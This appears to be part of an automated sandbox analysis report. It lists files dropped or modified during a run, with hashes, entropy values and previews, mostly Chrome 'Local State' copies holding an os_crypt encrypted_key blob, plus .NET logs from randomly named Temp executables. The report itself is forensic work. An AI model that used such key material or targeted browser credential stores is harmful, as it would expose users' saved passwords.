                                                                                                                                                SSDEEP:3072:hgLLD8n55EtvVAkRNGWr9x39UfkT7RdOADfFcbXafIB0u1GOJmA3iuRw:mLLD8Qtdf0S39U6TltaqfIlUOoSiuRw
                                                                                                                                                MD5:C6253FD173F227E4E7F1D3EE08B8F6E0
                                                                                                                                                SHA1:E47BBBFAEE3A8AB40D874B80A6567A1F29919548
                                                                                                                                                SHA-256:75D32CFD112422BB63CB13795D6E93350D085BB509A1DD2E380B202F2A9C32E7
                                                                                                                                                SHA-512:DC5CD4C2B983686ECF7DCD5A0AB3624AA95F59868B2D2CA23DC983D50576556090AEB3733F6BCA0D50C0962B64A7659321E4BA6055ADE9EE910BDEF0E8484B72
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.635541827385395e+12,"network":1.635509428e+12,"ticks":217354275.0,"uncertainty":3694755.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"disp
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Local Statet (copy)
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):87023
                                                                                                                                                Entropy (8bit):6.102321908149239
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:SUuGRcZdJiXrXafIyYOetKdapZsyTwL3cDGOLN0nTwY/A3iuR+:SUuFcbXafIB0u1GOJmA3iuR+
                                                                                                                                                MD5:04EA3ECF47F46C9AB073A1A8CAE1617E
                                                                                                                                                SHA1:062C6F716D0EE3126EB4C687FCA4F403DF7657B9
                                                                                                                                                SHA-256:53BC3171C0A8431E431E2DF17F7001AFD829930A31766D8898A81846A2992FA3
                                                                                                                                                SHA-512:84DBBDA70C2148B1FEDB2019519D5FF3BA18F4DB3CB7F218F0B9A140B86073C17BB303658132AEB6331682A48B887005C9C78B47755D5707A243465E8C8CC7E5
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"displayurl":true,"group_name_matcher":"*Shockwave Flash*","help_url":"https://support.google.com/chrome/?p=plugin_flash","lang":"en-US","mime_type
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\a5c47e94-90e2-4413-9940-476700670340.tmp
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):185224
                                                                                                                                                Entropy (8bit):6.076777172710909
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:h9cLD8n55EtvVAkRNGWr9x39UfkT7RdOAD+FcbXafIB0u1GOJmA3iuRw:vcLD8Qtdf0S39U6TlUaqfIlUOoSiuRw
                                                                                                                                                MD5:C005E1F8BBDB08BD8E31B8EFD5A481E3
                                                                                                                                                SHA1:CEF1835073662B631533BBBF9FD323D877FF6F4C
                                                                                                                                                SHA-256:4D12801559358F65B0327E9C6A83479734B92E8FC3002A6C2EA17771D5A577ED
                                                                                                                                                SHA-512:C4DB8A3CF32103BCD2EB3AB86B5F9FE24A82CD495751DE273A987894CFC401139DD6D506DD21BF09750A69B5E285746EE20BE48AD9B597C5FA2EF1ABFCD72C74
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.635541827385395e+12,"network":1.635509428e+12,"ticks":217354275.0,"uncertainty":3694755.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"disp
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\ba54649f-ae69-496b-a2e4-8ef3e2285261.tmp
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):92724
                                                                                                                                                Entropy (8bit):3.749334477100088
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:7K34dqZpX8O7vYlENtrevx73CV7+Hv6GOxrcfVhxCrD/SrApm4zcb1FlSO//VNMp:W34o+59CX+Oge7tD3Q3rG/KxPNBm
                                                                                                                                                MD5:B737DC295F256C510B59268D288E2D10
                                                                                                                                                SHA1:8B19D8F23BE9C56F483DC60E34B43420A076358E
                                                                                                                                                SHA-256:6BE0B7FE791BEEC2CDAEDFF948422F2047D5B982D70ABA87D52BB08E4649203C
                                                                                                                                                SHA-512:34256F525C39C13A1002FD6B99DC2E20B278059041D061D4741672F7ED1E6F803616EAD3FC36F17640B3C115AEC0920D992E7F679B3EC31E0552EE7D049AADA6
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: 0j..............*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L..P!...[)...%.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .o.f.f.i.c.e.\.o.f.f.i.c.e.1.6.\.......g.r.o.o.v.e.e.x...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .2.0.1.6...*...M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e. .f.o.r. .B.u.s.i.n.e.s.s. .E.x.t.e.n.s.i.o.n.s.....1.6...0...4.7.1.1...1.0.0.0.....*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....I8.D...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.C.o.m.m.o.n. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .S.h.a.r.e.d.\.O.F.F.I.C.E.1.6.\.m.s.o.s.h.e.x.t...d.l.l..@.....U/...%.c.o.m.m.o.n.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .s.h.a.r.e.d.\.o.f.f.i.c.e.1.6.\.......m.s.o.s.h.e.x.t...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.)...M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .S.h.e.l.l. .E.x.t.e.n.s.i.o.n. .H.a.n.d.l.e.r.s.......1.6...0...4.2.6.6...1.0.0.1.....D...C.:.\.P.r.o.g.r.a.m.
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\d1bea835-ec0c-4c85-9e15-c8ec6c7cb00a.tmp
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):185224
                                                                                                                                                Entropy (8bit):6.0767786021951835
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:h8PLD8n55EtvVAkRNGWr9x39UfkT7RdOAD+FcbXafIB0u1GOJmA3iuRw:aPLD8Qtdf0S39U6TlUaqfIlUOoSiuRw
                                                                                                                                                MD5:FB20DB9CC2ECCF503196D173C40E506F
                                                                                                                                                SHA1:31D0BFFF97A8EAD257DAC75A19334A4269CC18EA
                                                                                                                                                SHA-256:41A240AD71C126200141586D587A7C211542BDD575B038DA91B7DC1AC5C37250
                                                                                                                                                SHA-512:CE04CF7A66FF3F14C76A76C530E66903DCAB52962979A66B2D280DD19072530282CA9F23B922DB6367D733A4A09583138B24A52F4E97320A55F027E9D543A6D4
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.635541827385395e+12,"network":1.635509428e+12,"ticks":217354275.0,"uncertainty":3694755.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"disp
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\d6c3685d-5a55-4a4c-bd1c-94d6754e56bf.tmp
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                Category:modified
                                                                                                                                                Size (bytes):185223
                                                                                                                                                Entropy (8bit):6.076780072694005
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:hrFLD8n55EtvVAkRNGWr9x39UfkT7RdOADfFcbXafIB0u1GOJmA3iuRw:pFLD8Qtdf0S39U6TltaqfIlUOoSiuRw
                                                                                                                                                MD5:9A3435BB2916D49F5662DF2DF9B0234A
                                                                                                                                                SHA1:7FB511EA0AB19F8497578647E031083111A67A9C
                                                                                                                                                SHA-256:BFD8A4F5CCA6D59405E9D0E4FFDB32E8A37EAFBAF1855AE9F4FD57DABD10CCBA
                                                                                                                                                SHA-512:9CE8ECCD4AF9E34CC3FAF9F8BE21E3B591140366FC947FDB8238AD2C0808C8AEA7FD0FB91B67A1F2F50F644793DC6A328EEC02D4E9C8C12BA6DE2F0B997B9BB2
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.635541827385395e+12,"network":1.635509428e+12,"ticks":217354275.0,"uncertainty":3694755.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"disp
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\df341cd3-d32d-4701-b328-329dc38280ff.tmp
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):185224
                                                                                                                                                Entropy (8bit):6.076780174978916
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:t8PLD8n55EtvVAkRNGWr9x39UfkT7RdOAD+FcbXafIB0u1GOJmA3iuRw:mPLD8Qtdf0S39U6TlUaqfIlUOoSiuRw
                                                                                                                                                MD5:EA18642CBF5A149F2E28A60525572442
                                                                                                                                                SHA1:AC404D749E66CBEA45827B1C4734DE3053239B05
                                                                                                                                                SHA-256:FAEF55D41AC6DE200EDBD4EEA543F1332850256A91304CAFD4ED152C325DD06F
                                                                                                                                                SHA-512:72EF0293DED469C529E0F93334B6202AF370FAC88A945F3C3543C59A3D246318A432C6868AA451350342CCE9191C5943D6EB0F41CACFFD61F4375FC80AE8DE4D
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.635541827385395e+12,"network":1.635509428e+12,"ticks":217354275.0,"uncertainty":3694755.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13276832799845608"},"plugins":{"metadata":{"adobe-flash-player":{"disp
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\e8e32cf2-a584-474e-8e3a-c19f2984814d.tmp
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                Category:modified
                                                                                                                                                Size (bytes):87023
                                                                                                                                                Entropy (8bit):6.102321908149239
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:SUuGRcZdJiXrXafIyYOetKdapZsyTwL3cDGOLN0nTwY/A3iuR+:SUuFcbXafIB0u1GOJmA3iuR+
                                                                                                                                                MD5:04EA3ECF47F46C9AB073A1A8CAE1617E
                                                                                                                                                SHA1:062C6F716D0EE3126EB4C687FCA4F403DF7657B9
                                                                                                                                                SHA-256:53BC3171C0A8431E431E2DF17F7001AFD829930A31766D8898A81846A2992FA3
                                                                                                                                                SHA-512:84DBBDA70C2148B1FEDB2019519D5FF3BA18F4DB3CB7F218F0B9A140B86073C17BB303658132AEB6331682A48B887005C9C78B47755D5707A243465E8C8CC7E5
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"displayurl":true,"group_name_matcher":"*Shockwave Flash*","help_url":"https://support.google.com/chrome/?p=plugin_flash","lang":"en-US","mime_type
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\en-US-9-0.bdic
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):451603
                                                                                                                                                Entropy (8bit):5.009711072558331
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:ZHfRTyGZ6lup8Cfrvq4JBPKh+FBlESBw4p6:NfOCzvRKhGvwJ
                                                                                                                                                MD5:A78AD14E77147E7DE3647E61964C0335
                                                                                                                                                SHA1:CECC3DD41F4CEA0192B24300C71E1911BD4FCE45
                                                                                                                                                SHA-256:0D6803758FF8F87081FAFD62E90F0950DFB2DD7991E9607FE76A8F92D0E893FA
                                                                                                                                                SHA-512:DDE24D5AD50D68FC91E9E325D31E66EF8F624B6BB3A07D14FFED1104D3AB5F4EF1D7969A5CDE0DFBB19CB31C506F7DE97AF67C2F244F7E7E8E10648EA8321101
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: BDic.... ....6...."..Z..4g....6.2...{/...3...5....AF 1363.AF nm.AF pt.AF n1.AF p.AF tc.AF SM.AF M.AF S.AF MS.AF MNR.AF GDS.AF MNT.AF MH.AF MR.AF SZMR.AF MJ.AF MT.AF MY.AF MRZ.AF MN.AF MG.AF RM.AF N.AF MV.AF XM.AF DSM.AF SD.AF G.AF R.AF MNX.AF MRS.AF MD.AF MNRB.AF B.AF ZSMR.AF PM.AF SMNGJ.AF SMN.AF ZMR.AF SMGB.AF MZR.AF GM.AF SMR.AF SMDG.AF RMZ.AF ZM.AF MDG.AF MDT.AF SMNXT.AF SDY.AF LSDG.AF LGDS.AF GLDS.AF UY.AF U.AF DSGNX.AF GNDSX.AF DSG.AF Y.AF GS.AF IEMS.AF YP.AF ZGDRS.AF XGNVDS.AF UT.AF GNDS.AF GVDS.AF MYPS.AF XGNDS.AF TPRY.AF MDSG.AF ZGSDR.AF DYSG.AF PMYTNS.AF AGDS.AF DRZGS.AF PY.AF GSPMDY.AF EGVDS.AF SL.AF GNXDS.AF DSBG.AF IM.AF I.AF MDGS.AF SMY.AF DSGN.AF DSLG.AF GMDS.AF MDSBG.AF SGD.AF IY.AF P.AF DSMG.AF BLZGDRS.AF TR.AF AGSD.AF ZGBDRSL.AF PTRY.AF ASDGV.AF ASM.AF ICANGSD.AF ICAM.AF IKY.AF AMS.AF PMYTRS.AF BZGVDRS.AF SDRBZG.AF GVMDS.AF PSM.AF DGLS.AF GNVXDS.AF AGDSL.AF DGS.AF XDSGNV.AF BZGDRS.AF AM.AF AS.AF A.AF LDSG.AF AGVDS.AF SDG.AF LDSMG.AF EDSMG.AF EY.AF DRSMZG.AF PRYT.AF LZ
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\fe69df42-7940-45ca-ad99-1bfbbf7f932b.tmp
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):185223
                                                                                                                                                Entropy (8bit):6.076780072694005
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:hrFLD8n55EtvVAkRNGWr9x39UfkT7RdOADfFcbXafIB0u1GOJmA3iuRw:pFLD8Qtdf0S39U6TltaqfIlUOoSiuRw
                                                                                                                                                MD5:9A3435BB2916D49F5662DF2DF9B0234A
                                                                                                                                                SHA1:7FB511EA0AB19F8497578647E031083111A67A9C
                                                                                                                                                SHA-256:BFD8A4F5CCA6D59405E9D0E4FFDB32E8A37EAFBAF1855AE9F4FD57DABD10CCBA
                                                                                                                                                SHA-512:9CE8ECCD4AF9E34CC3FAF9F8BE21E3B591140366FC947FDB8238AD2C0808C8AEA7FD0FB91B67A1F2F50F644793DC6A328EEC02D4E9C8C12BA6DE2F0B997B9BB2
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.635541827385395e+12,"network":1.635509428e+12,"ticks":217354275.0,"uncertainty":3694755.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"disp
                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\B096.exe.log
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\B096.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1039
                                                                                                                                                Entropy (8bit):5.365622957937216
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:ML9E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7K84jE4Ks:MxHKXwYHKhQnoPtHoxHhAHKzvKvjHKs
                                                                                                                                                MD5:AE8CFF33270358D6EC23793128B3EF2F
                                                                                                                                                SHA1:5E6B156157EDEA4222A5E0C258AE9ADEBB8CB7CE
                                                                                                                                                SHA-256:498EAB9F855E7CE9B812EAD41339A9475127F0C8E7249033B975071D2292220C
                                                                                                                                                SHA-512:473111AD332D5E66724AFB0CE5A1E1C97890D60484A818D1DB8C2386A99C05BAE6C9D5C535DDFB6790BF5707C153502B938BE201393A3D70342A62902E0A3C98
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutra
                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\BBE1.exe.log
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\BBE1.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2388
                                                                                                                                                Entropy (8bit):5.316698480382997
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:MxHKXwYHKhQnoPtHoxHhAHKzvKvDfHK7HKhBHKdHKBSTHvmHKAHKoLHG1qHqHAHJ:iqXwYqhQnoPtIxHeqzyLq7qLqdqsOqAL
                                                                                                                                                MD5:5A67F45FC45A5C358BA694BE7D6FDE4A
                                                                                                                                                SHA1:5670BA980A3F52150C0D41B819A60AB7E0620567
                                                                                                                                                SHA-256:485DCB4FFCD317D66CAB28BC902D252C440AEE78067C651AEFA124D46073FECF
                                                                                                                                                SHA-512:0C7AFCB6CFF807B4514447019FED5BC398B488E3D7BBD332CE85AD774FB05C84AB5C5B99EC0BF48CB56CC8E8C52BEA1AA31459182F1D40234F663ECC279F6E7C
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral
                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DF3A.exe.log
